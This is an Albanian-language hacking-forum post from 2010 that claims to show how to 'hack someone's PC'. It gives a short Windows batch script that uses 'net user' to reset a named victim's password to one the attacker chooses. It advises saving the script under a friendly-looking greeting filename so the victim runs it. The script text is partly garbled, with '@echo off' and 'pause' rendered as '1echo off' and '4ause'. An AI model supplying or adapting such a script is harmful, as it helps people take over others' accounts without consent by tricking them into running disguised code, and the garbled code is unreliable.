ForumForum  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 si tja hackum pc dikujna

Shko poshtë 
AutoriMesazh
aTdh3
WebMaster
WebMaster


Posts : 214
Join date : 12/01/2010

MesazhTitulli: si tja hackum pc dikujna   Thu Jan 14, 2010 5:06 am

une e kom provu 100% funksionon per te funksionuar kjo duhet te dini net userin e atij qe deshironi tja hackoni pc kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

1echo off
2:net user "P.SH. emri i viktimes" dhe passin e ri qe doni ju *654321*
3:echo "tung i dashuri shok "
4ause

Qe edhe ma shpjegim te mire


1echo off
2:net user Big-POwer *654321*
3:echo Tung MY Freind
4ause

mos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Tung My Freind.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
si tja hackum pc dikujna
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Gea - Group (Grannqe - Enis - Atdhe) - Protected By OpojaHackersGroup :: Hacking-
Kërce tek: